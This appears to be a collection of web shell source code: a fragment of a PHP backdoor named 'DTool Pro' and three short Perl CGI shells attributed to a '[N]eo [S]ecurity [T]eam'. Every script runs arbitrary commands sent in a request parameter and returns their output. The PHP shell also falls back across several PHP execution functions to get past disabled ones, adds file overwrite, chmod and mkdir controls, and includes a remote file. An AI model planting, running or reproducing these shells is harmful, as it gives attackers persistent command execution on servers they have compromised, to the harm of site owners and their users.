<tr><td><form name="formulario" id="formulario" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmd" type="text" id="cmd" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
<script>
function focar(){window.document.formulario.cmd.focus();window.document.formulario.cmd.select();}
</script>
</td></tr></table><table><tr><td>
<?php
ob_start();
if(isset($chdir)) @chdir($chdir);
function safemode($what){echo "This server is in safemode. Try to use DTool in Safemode.";}
function nofunction($what){echo "The admin disabled all the functions to send a cmd to the system.";}
function shell($what){echo(shell_exec($what));}
function popenn($what){
   $handle=popen("$what", "r");
   $out=@fread($handle, 2096);
   echo $out;
   @pclose($handle);
}
function execc($what){
   exec("$what",$array_out);
   $out=implode("\n",$array_out);
   echo $out;
}
function procc($what){
   //na sequencia: stdin, stdout, sterr
   if($descpec = array(0 => array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
   $process = @proc_open("$what",$descpec,$pipes);
   if (is_resource($process)) {
      fwrite($pipes[0], "");
      fclose($pipes[0]);

      while(!feof($pipes[2])) {
         $erro_retorno = fgets($pipes[2], 4096);
         if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
      }
          fclose($pipes[2]);

      while(!feof($pipes[1])) {
         echo fgets($pipes[1], 4096);
      }
      fclose($pipes[1]);

      $ok_p_fecha = @proc_close($process);
   }else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
}

$funE="function_exists";
if($safe){$fe="safemode";$feshow=$fe;}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
else {$fe="nofunction";$feshow=$fe;}
if($fu!="0" or !empty($fu)){
  if($fu==1){$fe="passthru";$feshow=$fe;}
  if($fu==2){$fe="system";$feshow=$fe;}
  if($fu==3){$fe="execc";$feshow="exec";}
  if($fu==4){$fe="popenn";$feshow="popen";}
  if($fu==5){$fe="shell";$feshow="shell_exec";}
  if($fu==6){$fe="procc";$feshow="proc_open";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="6">use proc_open()*new
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table>

#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else
{
print "[N]eo [S]ecurity [T]eam [NST]"
}

#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else{ print "[N]eo [S]ecurity [T]eam [NST]"
}

#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("p");
my $a=param("a");
if ($a || $k)
{
$l=`$k 2>&1`;
print start_form,textarea("p",$k,3,50);
print submit("Enter");
print end_form;
print pre($l);
}
print $ENV{"SERVER_NAME"};